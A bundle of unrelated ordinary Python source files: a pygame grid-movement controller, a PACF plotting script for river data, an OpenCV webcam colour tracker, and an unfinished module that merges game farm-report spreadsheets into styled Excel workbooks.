import pygame from ..base import Manual from ...enums import Effects class ManualSquare(Manual): inputs = { 'up': pygame.key.key_code('Z'), 'left': pygame.key.key_code('Q'), 'down': pygame.key.key_code('S'), 'right': pygame.key.key_code('D'), } def run_one_step(self, key) -> None: if not key: return if key == self.inputs['up']: # Go up self.move_character(0) elif key == self.inputs['left']: # Go left self.move_character(1) elif key == self.inputs['down']: # Go down self.move_character(2) elif key == self.inputs['right']: # Go right self.move_character(3) def move_character(self, direction: int, amount: int = 1) -> None: """ Changes the position of the character by `amount` cell(s) on a squared grid. :param int direction: Direction the character should move to. Mapping: 0: up 1: left 2: down 3: right :param int amount: How many cells it will try to move. Default is 1. """ if direction not in range(4): raise ValueError(f'Invalid direction {direction!r}, should be an integer between 0 and 3 included.') new_x, new_y = self.character.location for _ in range(amount): if direction == 0: new_y -= 1 elif direction == 1: new_x -= 1 elif direction == 2: new_y += 1 elif direction == 3: new_x += 1 # Check if new coords are in the available space max_x, max_y = self.level.content.shape if 0 <= new_x < max_x and 0 <= new_y < max_y: # Get the object which is on our path next_step_cell_object_id = self.level.content[new_x, new_y] next_step_cell_object = self.objects[next_step_cell_object_id - 1] if next_step_cell_object.traversable: self.character.move_and_handle_object_effect(new_x, new_y, next_step_cell_object) if next_step_cell_object.effect == Effects.LEVEL_FINISH: self._running = False # If the character is dead, end. if not self.character.is_alive(): self._running = False
0.810854
0.285602
import matplotlib.pyplot as plt plt.rcParams['font.size']=6 import os root_path = os.path.dirname(os.path.abspath('__file__')) # root_path = os.path.abspath(os.path.join(root_path,os.path.pardir)) graphs_path = root_path+'/results_analysis/graphs/' import sys sys.path.append(root_path) from plot_pacfs import plot_pacf,plot_pacfs if __name__ == "__main__": # plot_pacf( # pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/huaxian-vmd-pacf.eps', # ) plot_pacfs( pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', save_path=graphs_path+'/huaxian-vmd-pacf.tif', format='TIFF', dpi=600, ) plot_pacf( pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', save_path=graphs_path+'/huaxian-vmd-imf1-pacf.tif', subsignal_id=1, format='TIFF', dpi=1200, ) # plot_pacf( # pacf_path=root_path+'/Xianyang_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Xianyang_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Xianyang_vmd/data/lo_bounds20.csv', # save_path = graphs_path+'/xianyang-vmd-pacf.eps' # ) # plot_pacf( # pacf_path=root_path+'/Xianyang_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Xianyang_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Xianyang_vmd/data/lo_bounds20.csv', # save_path = graphs_path+'/xianyang-vmd-pacf.tif', # format='TIFF', # dpi=1000, # ) # plot_pacf( # pacf_path=root_path+'/Zhangjiashan_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Zhangjiashan_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Zhangjiashan_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/Zhangjiashan_vmd-pacf.eps' # ) # plot_pacf( # 
pacf_path=root_path+'/Zhangjiashan_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Zhangjiashan_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Zhangjiashan_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/Zhangjiashan_vmd-pacf.tif', # format='TIFF', # dpi=1000, # )
results_analysis/plot_pacf_for_all.py
import matplotlib.pyplot as plt plt.rcParams['font.size']=6 import os root_path = os.path.dirname(os.path.abspath('__file__')) # root_path = os.path.abspath(os.path.join(root_path,os.path.pardir)) graphs_path = root_path+'/results_analysis/graphs/' import sys sys.path.append(root_path) from plot_pacfs import plot_pacf,plot_pacfs if __name__ == "__main__": # plot_pacf( # pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/huaxian-vmd-pacf.eps', # ) plot_pacfs( pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', save_path=graphs_path+'/huaxian-vmd-pacf.tif', format='TIFF', dpi=600, ) plot_pacf( pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', save_path=graphs_path+'/huaxian-vmd-imf1-pacf.tif', subsignal_id=1, format='TIFF', dpi=1200, ) # plot_pacf( # pacf_path=root_path+'/Xianyang_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Xianyang_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Xianyang_vmd/data/lo_bounds20.csv', # save_path = graphs_path+'/xianyang-vmd-pacf.eps' # ) # plot_pacf( # pacf_path=root_path+'/Xianyang_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Xianyang_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Xianyang_vmd/data/lo_bounds20.csv', # save_path = graphs_path+'/xianyang-vmd-pacf.tif', # format='TIFF', # dpi=1000, # ) # plot_pacf( # pacf_path=root_path+'/Zhangjiashan_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Zhangjiashan_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Zhangjiashan_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/Zhangjiashan_vmd-pacf.eps' # ) # plot_pacf( # 
pacf_path=root_path+'/Zhangjiashan_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Zhangjiashan_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Zhangjiashan_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/Zhangjiashan_vmd-pacf.tif', # format='TIFF', # dpi=1000, # )
0.238107
0.148541
import numpy as np import cv2 import argparse from collections import deque import time from pynput.keyboard import Key, Controller class CameraCapture(): def __init__(self): self.cap = cv2.VideoCapture(0) self.Lower_green = np.array([110,50,50]) self.Upper_green = np.array([130,255,255]) self.pts = deque(maxlen=64) self.img = None self.mask = None self.res = None def visualize_trace(self): for i in range (1,len(self.pts)): if self.pts[i-1]is None or self.pts[i] is None: continue thick = int(np.sqrt(len(self.pts) / float(i + 1)) * 2.5) cv2.line(self.img, self.pts[i-1],self.pts[i],(0,0,225),thick) def visualize_frame(self): self.img = cv2.flip(self.img, 1) cv2.imshow("Frame", self.img) # cv2.imshow("mask", self.mask) # cv2.imshow("res", self.res) def cleanup(self): self.cap.release() cv2.destroyAllWindows() def capture_one_fram(self): ret, self.img=self.cap.read() hsv=cv2.cvtColor(self.img,cv2.COLOR_BGR2HSV) kernel=np.ones((5,5),np.uint8) self.mask=cv2.inRange(hsv,self.Lower_green,self.Upper_green) self.mask = cv2.erode(self.mask, kernel, iterations=2) self.mask=cv2.morphologyEx(self.mask,cv2.MORPH_OPEN,kernel) #mask=cv2.morphologyEx(mask,cv2.MORPH_CLOSE,kernel) self.mask = cv2.dilate(self.mask, kernel, iterations=1) self.res=cv2.bitwise_and(self.img,self.img,mask=self.mask) cnts,heir=cv2.findContours(self.mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2:] center = None x, y = -1, -1 if len(cnts) > 0: c = max(cnts, key=cv2.contourArea) ((x, y), radius) = cv2.minEnclosingCircle(c) M = cv2.moments(c) center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"])) print(x, y) if radius > 5: cv2.circle(self.img, (int(x), int(y)), int(radius),(0, 255, 255), 2) cv2.circle(self.img, center, 5, (0, 0, 255), -1) # self.visualize_trace() print(x, y) self.pts.appendleft(center) self.visualize_trace() return x,y class MoveFinder(CameraCapture): def __init__(self): super().__init__() self.consecutive_three = deque(maxlen=3) self.start_pos = (0, 0) self.end_pos = (0, 0) if 
__name__ == '__main__': cam = CameraCapture() while True: cam.capture_one_fram() # cam.visualize_trace() cam.visualize_frame() k = cv2.waitKey(ord('p')) & 0xFF if k == ord('p'): break cam.cleanup()
new_try.py
import numpy as np import cv2 import argparse from collections import deque import time from pynput.keyboard import Key, Controller class CameraCapture(): def __init__(self): self.cap = cv2.VideoCapture(0) self.Lower_green = np.array([110,50,50]) self.Upper_green = np.array([130,255,255]) self.pts = deque(maxlen=64) self.img = None self.mask = None self.res = None def visualize_trace(self): for i in range (1,len(self.pts)): if self.pts[i-1]is None or self.pts[i] is None: continue thick = int(np.sqrt(len(self.pts) / float(i + 1)) * 2.5) cv2.line(self.img, self.pts[i-1],self.pts[i],(0,0,225),thick) def visualize_frame(self): self.img = cv2.flip(self.img, 1) cv2.imshow("Frame", self.img) # cv2.imshow("mask", self.mask) # cv2.imshow("res", self.res) def cleanup(self): self.cap.release() cv2.destroyAllWindows() def capture_one_fram(self): ret, self.img=self.cap.read() hsv=cv2.cvtColor(self.img,cv2.COLOR_BGR2HSV) kernel=np.ones((5,5),np.uint8) self.mask=cv2.inRange(hsv,self.Lower_green,self.Upper_green) self.mask = cv2.erode(self.mask, kernel, iterations=2) self.mask=cv2.morphologyEx(self.mask,cv2.MORPH_OPEN,kernel) #mask=cv2.morphologyEx(mask,cv2.MORPH_CLOSE,kernel) self.mask = cv2.dilate(self.mask, kernel, iterations=1) self.res=cv2.bitwise_and(self.img,self.img,mask=self.mask) cnts,heir=cv2.findContours(self.mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2:] center = None x, y = -1, -1 if len(cnts) > 0: c = max(cnts, key=cv2.contourArea) ((x, y), radius) = cv2.minEnclosingCircle(c) M = cv2.moments(c) center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"])) print(x, y) if radius > 5: cv2.circle(self.img, (int(x), int(y)), int(radius),(0, 255, 255), 2) cv2.circle(self.img, center, 5, (0, 0, 255), -1) # self.visualize_trace() print(x, y) self.pts.appendleft(center) self.visualize_trace() return x,y class MoveFinder(CameraCapture): def __init__(self): super().__init__() self.consecutive_three = deque(maxlen=3) self.start_pos = (0, 0) self.end_pos = (0, 0) if 
__name__ == '__main__': cam = CameraCapture() while True: cam.capture_one_fram() # cam.visualize_trace() cam.visualize_frame() k = cv2.waitKey(ord('p')) & 0xFF if k == ord('p'): break cam.cleanup()
0.392919
0.200088
import glob
import os
from datetime import datetime
from enum import IntEnum, auto
from logging import Logger
from typing import Final, Optional, Union

import openpyxl
import pandas as pd
import python_lib_for_me as pyl
from openpyxl.worksheet.worksheet import Worksheet
from styleframe import StyleFrame, Styler, utils

from fgo_farm_report_collection.util import const_util, pandas_util


class EnumOfProc(IntEnum):
    """Kind of farm-report generation result that can be merged."""
    GENERATE_LIST = auto()
    GENERATE_USER_TOTAL_SUMMARY = auto()
    GENERATE_QUEST_TOTAL_SUMMARY = auto()
    GENERATE_INDIVIDUAL_SUMMARY = auto()


def do_logic_that_merge_list(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge farm-report list files into one workbook.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告一覧マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_LIST,
            const_util.FARM_REPORT_LIST_FILE_PATH,
            const_util.FARM_REPORT_LIST_HEADER,
            append_sheet,
            const_util.FARM_REPORT_LIST_MERGE_RESULT_FILE_PATH,
            '周回報告一覧',
            {
                const_util.FARM_REPORT_LIST_HEADER[0]: 20,
                const_util.FARM_REPORT_LIST_HEADER[1]: 20,
                const_util.FARM_REPORT_LIST_HEADER[2]: 14,
                const_util.FARM_REPORT_LIST_HEADER[3]: 25,
                const_util.FARM_REPORT_LIST_HEADER[4]: 20,
                const_util.FARM_REPORT_LIST_HEADER[5]: 10,
                const_util.FARM_REPORT_LIST_HEADER[6]: 200,
            },
            'A4',
            ['A1:G1', 'A2:G2']
        )
    except Exception:
        # Bare raise preserves the original traceback (the original used
        # `raise(e)`, which stacks an extra re-raise frame).
        raise
    finally:
        pyl.log_inf(lg, f'周回報告一覧マージを終了します。')

    return None


def do_logic_that_merge_yearly_usr_tot_sum(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge yearly per-user total summaries.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告年間ユーザ全体概要マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_USER_TOTAL_SUMMARY,
            const_util.FARM_REPORT_YEARLY_USR_TOT_SUM_FILE_PATH,
            const_util.FARM_REPORT_USR_TOT_SUM_HEADER,
            append_sheet,
            const_util.FARM_REPORT_YEARLY_USR_TOT_SUM_MERGE_RESULT_FILE_PATH,
            'クエスト種別ごとの年間周回数(ユーザ編)',
            {
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[0]: 20,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[1]: 20,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[2]: 10,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[3]: 10,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[4]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[5]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[6]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[7]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[8]: 15,
            },
            'A4',
            ['A1:I1', 'A2:I2']
        )
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告年間ユーザ全体概要マージを終了します。')

    return None


def do_logic_that_merge_yearly_qst_tot_sum(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge yearly per-quest total summaries.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告年間クエスト全体概要マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY,
            const_util.FARM_REPORT_YEARLY_QST_TOT_SUM_FILE_PATH,
            const_util.FARM_REPORT_QST_TOT_SUM_HEADER,
            append_sheet,
            const_util.FARM_REPORT_YEARLY_QST_TOT_SUM_MERGE_RESULT_FILE_PATH,
            'クエスト種別ごとの年間周回数(クエスト編)',
            {
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[0]: 20,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[1]: 20,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[2]: 10,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[3]: 10,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[4]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[5]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[6]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[7]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[8]: 15,
            },
            'A4',
            ['A1:I1', 'A2:I2']
        )
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告年間クエスト全体概要マージを終了します。')

    return None


def do_logic_that_merge_monthly_usr_tot_sum(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge monthly per-user total summaries.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告月間ユーザ全体概要マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_USER_TOTAL_SUMMARY,
            const_util.FARM_REPORT_MONTHLY_USR_TOT_SUM_FILE_PATH,
            const_util.FARM_REPORT_USR_TOT_SUM_HEADER,
            append_sheet,
            const_util.FARM_REPORT_MONTHLY_USR_TOT_SUM_MERGE_RESULT_FILE_PATH,
            'クエスト種別ごとの月間周回数(ユーザ編)',
            {
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[0]: 20,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[1]: 20,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[2]: 10,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[3]: 10,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[4]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[5]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[6]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[7]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[8]: 15,
            },
            'A4',
            ['A1:I1', 'A2:I2']
        )
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告月間ユーザ全体概要マージを終了します。')

    return None


def do_logic_that_merge_monthly_qst_tot_sum(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge monthly per-quest total summaries.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告月間クエスト全体概要マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY,
            const_util.FARM_REPORT_MONTHLY_QST_TOT_SUM_FILE_PATH,
            const_util.FARM_REPORT_QST_TOT_SUM_HEADER,
            append_sheet,
            const_util.FARM_REPORT_MONTHLY_QST_TOT_SUM_MERGE_RESULT_FILE_PATH,
            'クエスト種別ごとの月間周回数(クエスト編)',
            {
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[0]: 20,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[1]: 20,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[2]: 10,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[3]: 10,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[4]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[5]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[6]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[7]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[8]: 15,
            },
            'A4',
            ['A1:I1', 'A2:I2']
        )
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告月間クエスト全体概要マージを終了します。')

    return None


def do_logic_that_merge_ind_sum(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge individual (per-user) summaries.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告個人概要マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_INDIVIDUAL_SUMMARY,
            const_util.FARM_REPORT_IND_SUM_FILE_PATH,
            const_util.FARM_REPORT_IND_SUM_HEADER,
            append_sheet,
            const_util.FARM_REPORT_IND_SUM_MERGE_RESULT_FILE_PATH,
            'ユーザごとの周回数',
            {
                const_util.FARM_REPORT_IND_SUM_HEADER[0]: 10,
                const_util.FARM_REPORT_IND_SUM_HEADER[1]: 17,
                const_util.FARM_REPORT_IND_SUM_HEADER[2]: 17,
                const_util.FARM_REPORT_IND_SUM_HEADER[3]: 17,
            },
            'A4',
            ['A1:D1', 'A2:D2']
        )
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告個人概要マージを終了します。')

    return None


def __do_logic_that_merge_gen_result(
        enum_of_proc: EnumOfProc,
        gen_result_file_path_format: str,
        gen_result_header: list[str],
        append_merge_result_sheet: bool,
        merge_result_file_path: str,
        merge_result_book_name: str,
        merge_result_column_widths: dict[str, Union[int, float]],
        merge_result_cell_to_fix_window_frame: str,
        merge_result_ranges_to_merge_cells: list[str]
    ) -> None:
    '''Common merge logic: collect generation-result files matching the
    given path pattern and merge them into a single styled workbook.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告生成結果マージ(共通)を開始します。')

        # Build a wildcard path from the directory and extension of the
        # format path, then glob all generation-result files.
        gen_result_file_dir: str = os.path.dirname(gen_result_file_path_format)
        gen_result_file_ext: str = os.path.splitext(gen_result_file_path_format)[1]
        gen_result_file_path_with_wildcard: str = \
            gen_result_file_dir + '/*' + gen_result_file_ext
        gen_result_file_paths: list[str] = glob.glob(gen_result_file_path_with_wildcard)

        # Nothing to merge: warn and return.
        if len(gen_result_file_paths) == 0:
            pyl.log_war(lg, f'周回報告生成結果ファイルの件数が0件です。' +
                            f'(gen_result_file_path:{gen_result_file_path_with_wildcard})')
        else:
            # Generate the merged workbook with pandas/StyleFrame
            __generate_merge_result_file_by_pandas(
                enum_of_proc,
                gen_result_file_paths,
                gen_result_header,
                append_merge_result_sheet,
                merge_result_file_path,
                merge_result_book_name,
                merge_result_column_widths,
                merge_result_cell_to_fix_window_frame
            )

            # Post-process the workbook with OpenPyXL (cell merging)
            __edit_merge_result_file_by_openpyxl(
                merge_result_file_path,
                merge_result_ranges_to_merge_cells
            )

            pyl.log_inf(lg, f'周回報告マージ結果ファイルパス:{merge_result_file_path}')
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告生成結果マージ(共通)を終了します。')

    return None


def __generate_merge_result_file_by_pandas(
        enum_of_proc: EnumOfProc,
        gen_result_file_paths: list[str],
        gen_result_header: list[str],
        append_merge_result_sheet: bool,
        merge_result_file_path: str,
        merge_result_book_name: str,
        merge_result_column_widths: dict[str, Union[int, float]],
        merge_result_cell_to_fix_window_frame: str
    ) -> None:
    '''Generate the merged result workbook (pandas/StyleFrame): one sheet
    per generation-result file, each with a two-row header part and a
    styled data part.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)

        excel_writer: Optional[pd.ExcelWriter] = None
        try:
            # Create the Excel writer; append mode only when requested AND
            # the target workbook already exists.
            if append_merge_result_sheet \
                    and os.path.isfile(merge_result_file_path):
                excel_writer = StyleFrame.ExcelWriter(
                    merge_result_file_path,
                    mode='a',
                    if_sheet_exists='replace',  # overlay not working
                )
            else:
                excel_writer = StyleFrame.ExcelWriter(
                    merge_result_file_path,
                    mode='w',
                )

            # Write one sheet per generation-result file (newest first).
            for gen_result_file_path in reversed(gen_result_file_paths):
                pyl.log_inf(lg, f'周回報告生成結果ファイルパス:{gen_result_file_path}')

                # Sheet name derived from the source file name
                merge_result_sheet_name: str = pyl.generate_file_name(gen_result_file_path)

                # Header-part StyleFrames (title rows + update timestamp)
                merge_result_header_part_sfs: list[StyleFrame] = \
                    __generate_merge_result_header_part_sfs(
                        merge_result_book_name, merge_result_sheet_name, gen_result_header)

                # Load the generation-result DataFrame for this proc kind
                gen_result_df: pd.DataFrame = pd.DataFrame()
                if enum_of_proc == EnumOfProc.GENERATE_LIST:
                    gen_result_df = pandas_util.read_farm_report_list_file(
                        gen_result_file_path, True, True)
                elif enum_of_proc == EnumOfProc.GENERATE_USER_TOTAL_SUMMARY:
                    gen_result_df = pandas_util.read_farm_report_usr_tot_sum_file(
                        gen_result_file_path, True, True)
                elif enum_of_proc == EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY:
                    gen_result_df = pandas_util.read_farm_report_qst_tot_sum_file(
                        gen_result_file_path, True, True)
                elif enum_of_proc == EnumOfProc.GENERATE_INDIVIDUAL_SUMMARY:
                    gen_result_df = pandas_util.read_farm_report_ind_sum_file(
                        gen_result_file_path, True, True)

                # Apply formatting to the data part
                merge_result_data_part_sf: StyleFrame = __apply_formatting_to_gen_result(
                    gen_result_df, merge_result_column_widths)

                # Save header + data StyleFrames to the sheet
                pandas_util.save_farm_report_merge_result_sf(
                    merge_result_header_part_sfs,
                    merge_result_data_part_sf,
                    excel_writer,
                    merge_result_sheet_name,
                    cell_to_fix_window_frame=merge_result_cell_to_fix_window_frame,
                )
        except Exception:
            pyl.log_err(lg, f'周回報告生成結果マージ結果ファイルへの出力に失敗しました。')
            raise
        finally:
            if excel_writer is not None:
                excel_writer.close()
    except Exception:
        raise

    return None


def __generate_merge_result_header_part_sfs(
        merge_result_book_name: str,
        merge_result_sheet_name: str,
        gen_result_header: list[str]
    ) -> list[StyleFrame]:
    '''Build the two header-part StyleFrames: (1) book/sheet title columns
    padded to the header width, (2) the update date/time column.'''

    merge_result_header_part_sfs: list[StyleFrame] = []

    # Header part 01: title column followed by empty padding columns so the
    # header spans the same width as the data header.
    merge_result_header_part_col_num: int = 0
    merge_result_header_part_01_df: pd.DataFrame = pd.DataFrame({
        f'col_{merge_result_header_part_col_num}':
            [merge_result_book_name, merge_result_sheet_name]
    })
    for _ in range(len(gen_result_header) - 1):
        merge_result_header_part_col_num = merge_result_header_part_col_num + 1
        merge_result_header_part_01_df[f'col_{merge_result_header_part_col_num}'] = ''

    # Apply formatting to header part 01
    merge_result_header_part_01_sf: StyleFrame = \
        __apply_formatting_to_merge_result_header_part(
            merge_result_header_part_01_df, is_update_datetime_col=False)

    # Current update timestamp
    update_datetime: datetime = datetime.now()
    update_date: str = update_datetime.strftime('%Y-%m-%d')
    update_time: str = update_datetime.strftime('%H:%M:%S')

    # Header part 02: single right-aligned date/time column
    merge_result_header_part_col_num = merge_result_header_part_col_num + 1
    merge_result_header_part_02_df: pd.DataFrame = \
        pd.DataFrame({f'col_{merge_result_header_part_col_num}':
                      [update_date, update_time]})

    # Apply formatting to header part 02
    merge_result_header_part_02_sf: StyleFrame = \
        __apply_formatting_to_merge_result_header_part(
            merge_result_header_part_02_df, is_update_datetime_col=True)

    # Collect both parts in order
    merge_result_header_part_sfs.append(merge_result_header_part_01_sf)
    merge_result_header_part_sfs.append(merge_result_header_part_02_sf)

    return merge_result_header_part_sfs


def __apply_formatting_to_merge_result_header_part(
        merge_result_header_part_df: pd.DataFrame,
        merge_result_column_widths: dict[str, Union[int, float]] = {},
        is_update_datetime_col: bool = False
    ) -> StyleFrame:
    '''Apply formatting to a merge-result header part; the date/time column
    is right-aligned and shrink-to-fit.'''

    DATETIME_FORMAT: Final[str] = 'YYYY-MM-DD HH:MM:SS'

    # Default cell style
    default_style: Styler = Styler(
        bg_color=None,
        bold=False,
        font=const_util.FONT_NAME,
        font_size=const_util.FONT_SIZE,
        number_format=utils.number_formats.general,
        horizontal_alignment=(utils.horizontal_alignments.general
                              if is_update_datetime_col == False
                              else utils.horizontal_alignments.right),
        wrap_text=False,
        shrink_to_fit=False if is_update_datetime_col == False else True,
        date_time_format=DATETIME_FORMAT,
    )
    merge_result_header_part_sf: StyleFrame = \
        StyleFrame(merge_result_header_part_df, default_style)

    # Column widths
    merge_result_header_part_sf.set_column_width_dict(merge_result_column_widths)

    # Row heights (all but the last index entry)
    row_indexes: tuple = merge_result_header_part_sf.row_indexes
    merge_result_header_part_sf.set_row_height_dict({
        row_indexes[:len(row_indexes) - 1]: 20,
    })

    return merge_result_header_part_sf


def __apply_formatting_to_gen_result(
        gen_result_df: pd.DataFrame,
        merge_result_column_widths: dict[str, Union[int, float]] = {}
    ) -> StyleFrame:
    '''Apply formatting to the generation-result data part (default cell
    style, grey bold header row, column widths, row heights).'''

    DATETIME_FORMAT: Final[str] = 'YYYY-MM-DD HH:MM:SS'

    # Default cell style
    default_style: Styler = Styler(
        bg_color=None,
        bold=False,
        font=const_util.FONT_NAME,
        font_size=const_util.FONT_SIZE,
        number_format=utils.number_formats.thousands_comma_sep,
        horizontal_alignment=utils.horizontal_alignments.general,
        wrap_text=False,
        shrink_to_fit=False,
        date_time_format=DATETIME_FORMAT,
    )
    merge_result_data_part_sf: StyleFrame = StyleFrame(gen_result_df, default_style)

    # Header row style
    header_style: Styler = Styler(
        bg_color=utils.colors.grey,
        bold=True,
        font=const_util.FONT_NAME,
        font_size=const_util.FONT_SIZE,
        number_format=utils.number_formats.general,
        horizontal_alignment=utils.horizontal_alignments.center,
        wrap_text=True,
        shrink_to_fit=False,
        date_time_format=DATETIME_FORMAT,
    )
    merge_result_data_part_sf.apply_headers_style(header_style)

    # Column widths
    merge_result_data_part_sf.set_column_width_dict(merge_result_column_widths)

    # Row heights: header row is taller; data rows (if any) are uniform.
    row_indexes: tuple = merge_result_data_part_sf.row_indexes
    if len(row_indexes) == 1:
        merge_result_data_part_sf.set_row_height_dict({
            row_indexes[0]: 30,
        })
    else:
        merge_result_data_part_sf.set_row_height_dict({
            row_indexes[0]: 30,
            row_indexes[1:]: 20,
        })

    return merge_result_data_part_sf


def __edit_merge_result_file_by_openpyxl(
        merge_result_file_path: str,
        merge_result_ranges_to_merge_cells: list[str]
    ) -> None:
    '''Edit the merged workbook with OpenPyXL: merge the given cell ranges
    on every sheet, then save.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)

        merge_result_wb: Optional[openpyxl.Workbook] = None
        try:
            # Merge the header cell ranges on every sheet
            merge_result_wb = openpyxl.load_workbook(merge_result_file_path)
            for sheet_name in merge_result_wb.sheetnames:
                merge_result_ws: Worksheet = merge_result_wb[sheet_name]  # type: ignore
                # `cell_range` renamed from `range`, which shadowed the builtin.
                for cell_range in merge_result_ranges_to_merge_cells:
